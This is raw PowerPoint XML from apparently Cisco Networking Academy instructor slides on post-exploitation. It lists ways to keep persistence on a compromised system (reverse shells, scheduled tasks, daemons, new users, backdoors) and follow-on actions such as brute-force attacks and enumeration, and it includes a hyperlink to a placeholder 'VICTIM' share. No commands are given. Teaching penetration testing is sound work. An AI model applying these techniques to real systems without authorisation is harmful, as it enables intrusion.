              <a:rPr lang="en-US" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="B1E8FA"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(custom placeholder text!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4629150"/>
            <a:ext cx="7772400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>© 2023  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 0" descr="C:/Users/ahungerf/git/netacad-vudu/src/pptx/assets/Cisco_logo_sm.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="-16667" b="-16667"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4629150"/>
            <a:ext cx="365760" cy="365760"/>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UNK">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF"/>
        </a:solid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274320"/>
            <a:ext cx="9144000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(custom placeholder text!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="101"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a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(custom placeholder text!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4629150"/>
            <a:ext cx="7772400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>© 2023  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 0" descr="C:/Users/ahungerf/git/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hyperlink" Target="file:///\\VICTIM" TargetMode="External"/><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windows-server/administration/windows-commands/windows-commands"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6.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7.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0">
  <p:cSld name="Slide 2">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457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Instructor Materials – Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Planning Guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9625" y="476449"/>
            <a:ext cx="8229600" cy="4453359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="684213" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This PowerPoint deck has two parts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169545" marR="0" lvl="0" indent="-169545" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Instructor Planning Guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="1" indent="-215900" defTabSz="684213" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Information to help become familiar with the module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" marR="0" lvl="1" indent="-215900" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Teaching aids</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169545" marR="0" lvl="0" indent="-169545" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Instructor Class Presentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="1" indent="-215900" defTabSz="684213" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Optional slides to use in the classroom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" marR="0" lvl="1" indent="-215900" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Begins on slide # 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" marR="0" lvl="1" indent="-215900" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1600" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="142875" lvl="1" algn="ctr" defTabSz="684213" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: Remove the Planning Guide from this presentation before sharing it with anyone.</a:t>
            </a:r>
          </a:p>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endParaRPr lang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-13004" y="903870"/>
            <a:ext cx="891914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400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>After the exploitation phase, you need to maintain a foothold in a compromised system to perform additional tasks, such as installing and/or modifying services to connect back to the compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You can maintain the persistence of a compromised system in several ways, including the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Creating a bind or reverse shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Creating and manipulating scheduled jobs and tasks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Creating custom daemons and processes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Creating new users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Creating additional backdoors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Overview (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-13004" y="903870"/>
            <a:ext cx="8768180"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400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>When you maintain persistence in a compromised system, you can take several actions, such as the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Uploading additional tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Using local system tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Performing ARP scans and ping sweeps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Conducting DNS and directory services enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Launching brute-force attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Performing additional enumeration of users, groups, forests, sensitive data, and unencrypted files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
